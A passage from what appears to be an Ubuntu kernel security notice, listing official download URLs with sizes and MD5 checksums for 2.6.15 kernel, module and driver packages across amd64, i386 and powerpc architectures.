http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.15/fglrx-control_8.25.18+2.6.15.12-52.3_amd64.deb\n      Size/MD5:    76748 cc23398150beebe4a1d561bf9ff81706\n    http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.15/linux-restricted-modules-2.6.15-52-amd64-generic_2.6.15.12-52.3_amd64.deb\n      Size/MD5:  6861864 0654701d92f5de082562a776d201c110\n    http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.15/linux-restricted-modules-2.6.15-52-amd64-k8_2.6.15.12-52.3_amd64.deb\n      Size/MD5:  6861248 3ea71d011938ba44253b417acb105e80\n    http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.15/linux-restricted-modules-2.6.15-52-amd64-xeon_2.6.15.12-52.3_amd64.deb\n      Size/MD5:  6837846 6642dc1eff1db10dedd772a63641124a\n    http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.15/nic-restricted-firmware-2.6.15-52-amd64-generic-di_2.6.15.12-52.3_amd64.udeb\n      Size/MD5:   798882 0dfab4528cb8a35acaefe9927000f685\n    http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.15/nic-restricted-modules-2.6.15-52-amd64-generic-di_2.6.15.12-52.3_amd64.udeb\n      Size/MD5:   497228 5922e6e6038e6144f2e9643bf8de2287\n    http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.15/nvidia-glx-dev_1.0.8776+2.6.15.12-52.3_amd64.deb\n      Size/MD5:   167244 eb84a383434ff2a22cc68fb0ca060215\n    http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.15/nvidia-glx-legacy-dev_1.0.7174+2.6.15.12-52.3_amd64.deb\n      Size/MD5:   162302 fa7b1343f60ffbc8298da3bb0f7ac206\n    http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.15/nvidia-glx-legacy_1.0.7174+2.6.15.12-52.3_amd64.deb\n      Size/MD5:  6071704 db1d1a77b262ccd2e7d4bf4212919e1b\n    http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.15/nvidia-glx_1.0.8776+2.6.15.12-52.3_amd64.deb\n      Size/MD5:  7328604 305ee65ddbd1e715d5c8fc0d2e411db7\n    http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.15/xorg-driver-fglrx-dev_7.0.0-8.25.18+2.6.15.12-52.3_amd64.deb\n      Size/MD5:   125880 fe13a90e72b74c93432a97c4c2ecf88f\n    http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.15/xorg-driver-fglrx_7.0.0-8.25.18+2.6.15.12-52.3_amd64.deb\n      Size/MD5: 17297042 88992a1f7adea96330b4b1909a5a0605\n\n  i386 architecture (x86 compatible Intel/AMD):\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-backports-modules-2.6.15/linux-backports-modules-2.6.15-52-386_2.6.15-52.10_i386.deb\n      Size/MD5:   169386 de66f59240599c189971ff2617a32471\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-backports-modules-2.6.15/linux-backports-modules-2.6.15-52-686_2.6.15-52.10_i386.deb\n      Size/MD5:   177254 c645c75cefa72df027ecf9992a0321d3\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-backports-modules-2.6.15/linux-backports-modules-2.6.15-52-k7_2.6.15-52.10_i386.deb\n      Size/MD5:   175374 a78aeb6390f3b9056e0ba884aa7dea73\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-backports-modules-2.6.15/linux-backports-modules-2.6.15-52-server-bigiron_2.6.15-52.10_i386.deb\n      Size/MD5:   178040 ab1e27ab921d3c062af1d83a2711fd26\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-backports-modules-2.6.15/linux-backports-modules-2.6.15-52-server_2.6.15-52.10_i386.deb\n      Size/MD5:   178004 36432e0be482eff2ad7d7b11e3393685\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-backports-modules-2.6.15/nic-updates-modules-2.6.15-52-386-di_2.6.15-52.10_i386.udeb\n      Size/MD5:    90234 532960ad957a474af1d36f22c6f09d45\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-backports-modules-2.6.15/scsi-updates-modules-2.6.15-52-386-di_2.6.15-52.10_i386.udeb\n      Size/MD5:    90404 47bdb4c98e5bec0e9987190d0abc4ff6\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/acpi-modules-2.6.15-52-386-di_2.6.15-52.67_i386.udeb\n      Size/MD5:    18968 d4428c28842acd44ebbc900062265429\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-core-modules-2.6.15-52-386-di_2.6.15-52.67_i386.udeb\n      Size/MD5:    43448 09b66d5cc8ce769329e5cb1f5c5ff88a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-modules-2.6.15-52-386-di_2.6.15-52.67_i386.udeb\n      Size/MD5:   105204 7a968c3b6170d141b0cd6ae69d9ccb57\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/crc-modules-2.6.15-52-386-di_2.6.15-52.67_i386.udeb\n      Size/MD5:     2280 724ecd00ebbddee0cedc950d13e39c7e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext2-modules-2.6.15-52-386-di_2.6.15-52.67_i386.udeb\n      Size/MD5:    34572 257f312f78de2f814a6909fb11a51be3\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext3-modules-2.6.15-52-386-di_2.6.15-52.67_i386.udeb\n      Size/MD5:    96958 b7e56256c4e585f3d2b6ad110370aebc\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fat-modules-2.6.15-52-386-di_2.6.15-52.67_i386.udeb\n      Size/MD5:    37092 be752e4622e517275a340cff56052a0f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fb-modules-2.6.15-52-386-di_2.6.15-52.67_i386.udeb\n      Size/MD5:    44060 f2dc9462c8b4fb93e16f0cbbc39b5efb\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/firewire-core-modules-2.6.15-52-386-di_2.6.15-52.67_i386.udeb\n      Size/MD5:   167734 762f6dd3391cb3477c7eae7c5cf0ba8d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/floppy-modules-2.6.15-52-386-di_2.6.15-52.67_i386.udeb\n      Size/MD5:    33928 6685b0652c78ded543a1cf9e49da7c50\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ide-modules-2.6.15-52-386-di_2.6.15-52.67_i386.udeb\n      Size/MD5:   137840 7698662c1142eb2c2f94b79145ec08ae\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/input-modules-2.6.15-52-386-di_2.6.15-52.67_i386.udeb\n      Size/MD5:    46872 f91472c2465256ba325975329f7ab850\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ipv6-modules-2.6.15-52-386-di_2.6.15-52.67_i386.udeb\n      Size/MD5:   132966 0fe968b8f8abfcb323e2834e60c100f5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/irda-modules-2.6.15-52-386-di_2.6.15-52.67_i386.udeb\n      Size/MD5:   273450 f16f2f5c2cf9b35f5411785d1c57fc31\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/jfs-modules-2.6.15-52-386-di_2.6.15-52.67_i386.udeb\n      Size/MD5:   102252 10b945d089d0b473f999afedd1b922aa\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/kernel-image-2.6.15-52-386-di_2.6.15-52.67_i386.udeb\n      Size/MD5:  1595606 0a4698dbff475bb5b82e70606f207a37\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-52-386_2.6.15-52.67_i386.deb\n      Size/MD5:   859020 2b9ebda6ae3855a7732bd3d3641bd568\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-52-686_2.6.15-52.67_i386.deb\n      Size/MD5:   858486 2e8859c47eb2536c12b47f57d1ebae95\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-52-k7_2.6.15-52.67_i386.deb\n      Size/MD5:   859998 bd6e70b3830d5219e66a5414a1665dc7\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-52-server-bigiron_2.6.15-52.67_i386.deb\n      Size/MD5:   864228 d74d9ae20edecf320bb41b2e48c48e79\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-52-server_2.6.15-52.67_i386.deb\n      Size/MD5:   858828 b27f151fa2fbf48ed5b3f5f9899f3adc\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-52_2.6.15-52.67_i386.deb\n      Size/MD5:  6913986 281a26735bed07a88bcb08df8cbd717e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-52-386_2.6.15-52.67_i386.deb\n      Size/MD5: 21709730 fae2c52a1f4def5d9335feafd8d598cd\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-52-686_2.6.15-52.67_i386.deb\n      Size/MD5: 22506028 869a8657c02443b272666d8fb1a20a1c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-52-k7_2.6.15-52.67_i386.deb\n      Size/MD5: 22248206 b7c51bd51c0e66825a5bb4b098588756\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-52-server-bigiron_2.6.15-52.67_i386.deb\n      Size/MD5: 23606178 bd2a7c7353793db1baf04eb545a1241d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-52-server_2.6.15-52.67_i386.deb\n      Size/MD5: 23170614 47e400c98cb6f4f1073a7f36842a5753\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/loop-modules-2.6.15-52-386-di_2.6.15-52.67_i386.udeb\n      Size/MD5:    15502 f5a50985b9f50e270313efd51c2893b7\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/md-modules-2.6.15-52-386-di_2.6.15-52.67_i386.udeb\n      Size/MD5:   238534 4c6212ceee7d24bcbc795d95bc69e828\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nfs-modules-2.6.15-52-386-di_2.6.15-52.67_i386.udeb\n      Size/MD5:   196974 a9b29abd1bd7f5d1785f3544541eedca\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-firmware-2.6.15-52-386-di_2.6.15-52.67_i386.udeb\n      Size/MD5:  1048372 82c9bfc637ebd618304f722095df5c40\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-modules-2.6.15-52-386-di_2.6.15-52.67_i386.udeb\n      Size/MD5:  1740976 0400bbac3c7bbe293e2430299799128a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-pcmcia-modules-2.6.15-52-386-di_2.6.15-52.67_i386.udeb\n      Size/MD5:   160808 110bfbc0ed35dedcd74bf81dfce3c965\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-shared-modules-2.6.15-52-386-di_2.6.15-52.67_i386.udeb\n      Size/MD5:     9160 326fcb48a6d761e7d6fdc3395b6a05d3\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-usb-modules-2.6.15-52-386-di_2.6.15-52.67_i386.udeb\n      Size/MD5:    76472 2152f88992c83e99b7c6873a2d4e5429\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ntfs-modules-2.6.15-52-386-di_2.6.15-52.67_i386.udeb\n      Size/MD5:    53252 0a9985175e890c75d41898fe2a305ff7\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/parport-modules-2.6.15-52-386-di_2.6.15-52.67_i386.udeb\n      Size/MD5:    33048 bcc3df2f0b1013c1929e25ee78123640\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-modules-2.6.15-52-386-di_2.6.15-52.67_i386.udeb\n      Size/MD5:    85618 90b6e1f3e431ac12634cfa076eac5bd2\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-storage-modules-2.6.15-52-386-di_2.6.15-52.67_i386.udeb\n      Size/MD5:     6018 7954bb0452b484484c6eb1705c23f40d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/plip-modules-2.6.15-52-386-di_2.6.15-52.67_i386.udeb\n      Size/MD5:     8758 e823e4ef623bb5340a0c10d820b0890d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ppp-modules-2.6.15-52-386-di_2.6.15-52.67_i386.udeb\n      Size/MD5:    53588 0c5cedfaa84510004be3540b21780568\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/reiserfs-modules-2.6.15-52-386-di_2.6.15-52.67_i386.udeb\n      Size/MD5:   130770 7e007a7496f3bcaa2b48eb7cac38f5be\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/sata-modules-2.6.15-52-386-di_2.6.15-52.67_i386.udeb\n      Size/MD5:    98436 1bbfcdc956a8e8ef4081f8a66d553744\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-core-modules-2.6.15-52-386-di_2.6.15-52.67_i386.udeb\n      Size/MD5:    77176 58b8471224582c0f06064e11630f65b4\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-modules-2.6.15-52-386-di_2.6.15-52.67_i386.udeb\n      Size/MD5:  1768402 b16dff64c8931b07180dff1957b6327c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/serial-modules-2.6.15-52-386-di_2.6.15-52.67_i386.udeb\n      Size/MD5:    69552 2ecd40960f5beca9dad68467f7df8179\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/socket-modules-2.6.15-52-386-di_2.6.15-52.67_i386.udeb\n      Size/MD5:    11760 cfc0671977f053bf36c857f98bfe2f1d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ufs-modules-2.6.15-52-386-di_2.6.15-52.67_i386.udeb\n      Size/MD5:    36000 960e928198df9cc14f2b72ac6f87ac25\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-modules-2.6.15-52-386-di_2.6.15-52.67_i386.udeb\n      Size/MD5:   132582 a386519ba722acccea97790bc9b4032d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-storage-modules-2.6.15-52-386-di_2.6.15-52.67_i386.udeb\n      Size/MD5:    38546 4324a6661a6f1969929a1fb36a428125\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/xfs-modules-2.6.15-52-386-di_2.6.15-52.67_i386.udeb\n      Size/MD5:   299114 41b70c88021a4251235b931f264f004c\n    http://security.ubuntu.com/ubuntu/pool/multiverse/l/linux-restricted-modules-2.6.15/avm-fritz-kernel-source_3.11+2.6.15.12-52.3_i386.deb\n      Size/MD5:  3692834 595b8d31f672e6d2b5e94648da587ff7\n    http://security.ubuntu.com/ubuntu/pool/multiverse/l/linux-restricted-modules-2.6.15/fglrx-kernel-source_8.25.18+2.6.15.12-52.3_i386.deb\n      Size/MD5:   661002 63b1640dc6f25d8bbf442eaeb5e2173e\n    http://security.ubuntu.com/ubuntu/pool/multiverse/l/linux-restricted-modules-2.6.15/nvidia-kernel-source_1.0.8776+2.6.15.12-52.3_i386.deb\n      Size/MD5:  1694452 ec63480260bd4686acf628b8f2d0a4d5\n    http://security.ubuntu.com/ubuntu/pool/multiverse/l/linux-restricted-modules-2.6.15/nvidia-legacy-kernel-source_1.0.7174+2.6.15.12-52.3_i386.deb\n      Size/MD5:  1401938 90d1be1d02ca2570e1ff9a53108a1062\n    http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.15/avm-fritz-firmware-2.6.15-52_3.11+2.6.15.12-52.3_i386.deb\n      Size/MD5:  1205122 63e3ce320bcceeb4b493534fd06878c8\n    http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.15/fglrx-control_8.25.18+2.6.15.12-52.3_i386.deb\n      Size/MD5:    73654 c5b237fa6f40a5e0c7c936398d10f4c2\n    http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.15/linux-restricted-modules-2.6.15-52-386_2.6.15.12-52.3_i386.deb\n      Size/MD5:  8139028 ab19aa5d26256f4a49b2567c575a6f81\n    http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.15/linux-restricted-modules-2.6.15-52-686_2.6.15.12-52.3_i386.deb\n      Size/MD5:  7940228 6bc6899225c548f30bb282c6fefbcd29\n    http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.15/linux-restricted-modules-2.6.15-52-k7_2.6.15.12-52.3_i386.deb\n      Size/MD5:  7939054 c910ba191cbe2ff1d2d98053fe4cb956\n    http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.15/nic-restricted-firmware-2.6.15-52-386-di_2.6.15.12-52.3_i386.udeb\n      Size/MD5:   798676 7645cf5367888c041a55cbf5b77b2889\n    http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.15/nic-restricted-modules-2.6.15-52-386-di_2.6.15.12-52.3_i386.udeb\n      Size/MD5:   476148 871e3b1a338b99efc146cc9366eb887a\n    http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.15/nvidia-glx-dev_1.0.8776+2.6.15.12-52.3_i386.deb\n      Size/MD5:   148028 25e50651fb1151932866f1acc8e8bfe9\n    http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.15/nvidia-glx-legacy-dev_1.0.7174+2.6.15.12-52.3_i386.deb\n      Size/MD5:   140470 cbe30a4e6fa074a07309cff5132626f2\n    http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.15/nvidia-glx-legacy_1.0.7174+2.6.15.12-52.3_i386.deb\n      Size/MD5:  3060728 3a15df06c905db7f71f027207c5e88e2\n    http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.15/nvidia-glx_1.0.8776+2.6.15.12-52.3_i386.deb\n      Size/MD5:  4063682 fe3a1277228b560e712727679f593062\n    http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.15/xorg-driver-fglrx-dev_7.0.0-8.25.18+2.6.15.12-52.3_i386.deb\n      Size/MD5:   111310 3fd2866dfad94c7765e6abb204fcb612\n    http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.15/xorg-driver-fglrx_7.0.0-8.25.18+2.6.15.12-52.3_i386.deb\n      Size/MD5: 10557498 51bf0387f432ed54accfa5c826c506fe\n\n  powerpc architecture (Apple Macintosh G3/G4/G5):\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-backports-modules-2.6.15/linux-backports-modules-2.6.15-52-powerpc-smp_2.6.15-52.10_powerpc.deb\n      Size/MD5:   185626 edd40cd6bcfb7d3b3e7e0c2fad187dc4\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-backports-modules-2.6.15/linux-backports-modules-2.6.15-52-powerpc64-smp_2.6.15-52.10_powerpc.deb\n      Size/MD5:   203454 6f359968188452ef0a9f7a47f2bc906b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-backports-modules-2.6.15/linux-backports-modules-2.6.15-52-powerpc_2.6.15-52.10_powerpc.deb\n      Size/MD5:   183962 8899aea634394a432632795a0dab6848\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-backports-modules-2.6.15/nic-updates-modules-2.6.15-52-powerpc-di_2.6.15-52.10_powerpc.udeb\n      Size/MD5:    98104 2f7a355c7da2fe10c4e09e7b9ff57627\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-backports-modules-2.6.15/nic-updates-modules-2.6.15-52-powerpc64-smp-di_2.6.15-52.10_powerpc.udeb\n      Size/MD5:   121798 b21635edd66e1723b2613f336da66c8d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-backports-modules-2.6.15/scsi-updates-modules-2.6.15-52-powerpc-di_2.6.15-52.10_powerpc.udeb\n      Size/MD5:   103292 290aefd555053af550427729d243bd34\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-backports-modules-2.6.15/scsi-updates-modules-2.6.15-52-powerpc64-smp-di_2.6.15-52.10_powerpc.udeb\n      Size/MD5:   112204 ee138e7f1bcf34a4521a3e0df2da6aec\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/affs-modules-2.6.15-52-powerpc-di_2.6.15-52.67_powerpc.udeb\n      Size/MD5:    23730 bafae4f6b819e29a91cd933f137dbee6\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/affs-modules-2.6.15-52-powerpc64-smp-di_2.6.15-52.67_powerpc.udeb\n      Size/MD5:    25944 e19db8be47babd9bf1499a78d9ff15e6\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-core-modules-2.6.15-52-powerpc-di_2.6.15-52.67_powerpc.udeb\n      Size/MD5:    49308 e146b2a92e8f0e07164a7c9cff823ace\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-core-modules-2.6.15-52-powerpc64-smp-di_2.6.15-52.67_powerpc.udeb\n      Size/MD5:    51516 9925e90269a01bd21dd3c54ff6642e45\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/crc-modules-2.6.15-52-powerpc-di_2.6.15-52.67_powerpc.udeb\n      Size/MD5:     2302 c500d101fcce3284f388ba0021517811\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/crc-modules-2.6.15-52-powerpc64-smp-di_2.6.15-52.67_powerpc.udeb\n      Size/MD5:     2478 4fd66e5160f5aae620afe96a8272390f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext2-modules-2.6.15-52-powerpc-di_2.6.15-52.67_powerpc.udeb\n      Size/MD5:    40186 da2f5a32687c2f750206d2061dc63f80\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext2-modules-2.6.15-52-powerpc64-smp-di_2.6.15-52.67_powerpc.udeb\n      Size/MD5:    43754 ed7b4e37cce3baf959c15cdbc2b98bfb\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext3-modules-2.6.15-52-powerpc-di_2.6.15-52.67_powerpc.udeb\n      Size/MD5:   112598 4a2ff713c81aa3682d62f41d3b6243a1\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext3-modules-2.6.15-52-powerpc64-smp-di_2.6.15-52.67_powerpc.udeb\n      Size/MD5:   120652 6271a631ab6ceae1fafb4285f39d5d61\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fat-modules-2.6.15-52-powerpc-di_2.6.15-52.67_powerpc.udeb\n      Size/MD5:    40848 88aecdbe93d317449c0ec94131afc1d6\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fat-modules-2.6.15-52-powerpc64-smp-di_2.6.15-52.67_powerpc.udeb\n      Size/MD5:    45942 3eee30e2488a40f350925e08f2ce92a8\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fb-modules-2.6.15-52-powerpc-di_2.6.15-52.67_powerpc.udeb\n      Size/MD5:    29022 a283d73e23a684b192ae938631669212\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fb-modules-2.6.15-52-powerpc64-smp-di_2.6.15-52.67_powerpc.udeb\n      Size/MD5:    29894 1a360f1958fcd42894a77c8784eb84f5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/firewire-core-modules-2.6.15-52-powerpc-di_2.6.15-52.67_powerpc.udeb\n      Size/MD5:   211398 becd75f98073840525214ae1c4fafa06\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/firewire-core-modules-2.6.15-52-powerpc64-smp-di_2.6.15-52.67_powerpc.udeb\n      Size/MD5:   225200 058c9c8645b2068508a97f2740f6234c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/floppy-modules-2.6.15-52-powerpc-di_2.6.15-52.67_powerpc.udeb\n      Size/MD5:    45054 2626be12e63debc289a31b51a9034dc8\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/floppy-modules-2.6.15-52-powerpc64-smp-di_2.6.15-52.67_powerpc.udeb\n      Size/MD5:    40210 3eb61d86887039d2958fcff75b64dec1\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fs-common-modules-2.6.15-52-powerpc-di_2.6.15-52.67_powerpc.udeb\n      Size/MD5:     1934 1454a948886eea5d833fec5846bd0e6a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fs-common-modules-2.6.15-52-powerpc64-smp-di_2.6.15-52.67_powerpc.udeb\n      Size/MD5:     2196 c49c45ecafeb391ee281333f4afef63b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/hfs-modules-2.6.15-52-powerpc-di_2.6.15-52.67_powerpc.udeb\n      Size/MD5:    80608 64e955478edb55a6b9c16d3e6ceae72c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/hfs-modules-2.6.15-52-powerpc64-smp-di_2.6.15-52.67_powerpc.udeb\n      Size/MD5:    85960 d7b342ae619eecffa1175394541247be\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ide-modules-2.6.15-52-powerpc-di_2.6.15-52.67_powerpc.udeb\n      Size/MD5:   111632 e550b1816f61b16b4c5144f7a0b35dd3\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ide-modules-2.6.15-52-powerpc64-smp-di_2.6.15-52.67_powerpc.udeb\n      Size/MD5:   125776 844c66cbc66605eb82f75e23f339a29f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/input-modules-2.6.15-52-powerpc-di_2.6.15-52.67_powerpc.udeb\n      Size/MD5:    53404 faa41b9e613f37a472d120528df77530\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/input-modules-2.6.15-52-powerpc64-smp-di_2.6.15-52.67_powerpc.udeb\n      Size/MD5:    58476 57cc72611a1491286e1c1dbb2c59683f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ipv6-modules-2.6.15-52-powerpc-di_2.6.15-52.67_powerpc.udeb\n      Size/MD5:   147760 cc53b9050ec43a8be5c2fd324930109c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ipv6-modules-2.6.15-52-powerpc64-smp-di_2.6.15-52.67_powerpc.udeb\n      Size/MD5:   161706 dd3b423f109d3a038d69e59428339c36\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/irda-modules-2.6.15-52-powerpc-di_2.6.15-52.67_powerpc.udeb\n      Size/MD5:   317482 a4585a426ce71864308dfbbb654003c6\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/irda-modules-2.6.15-52-powerpc64-smp-di_2.6.15-52.67_powerpc.udeb\n      Size/MD5:   287578 bad62b03eaa33f90e5781ce66418321f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/jfs-modules-2.6.15-52-powerpc-di_2.6.15-52.67_powerpc.udeb\n      Size/MD5:   115852 af781795a328154d7d18723622483c27\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/jfs-modules-2.6.15-52-powerpc64-smp-di_2.6.15-52.67_powerpc.udeb\n      Size/MD5:   116516 fba37884eb62c2bb4e3d80be97364328\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/kernel-image-2.6.15-52-powerpc-di_2.6.15-52.67_powerpc.udeb\n      Size/MD5:  1923634 2ad21fe5b3130be19104739d8c21af45\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/kernel-image-2.6.15-52-powerpc64-smp-di_2.6.15-52.67_powerpc.udeb\n      Size/MD5:  2436304 fe1b77572b869ff3581ce308a08328e8\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-52-powerpc-smp_2.6.15-52.67_powerpc.deb\n      Size/MD5:   871692 b53dc4f8bfb05db45bc2b7159bcec9e2\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-52-powerpc64-smp_2.6.15-52.67_powerpc.deb\n      Size/MD5:   871228 fd1ff1169304220802a98cabdc359372\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-52-powerpc_2.6.15-52.67_powerpc.deb\n      Size/MD5:   866352 dfb1f043c87f244459bc0af06126ffa5\n    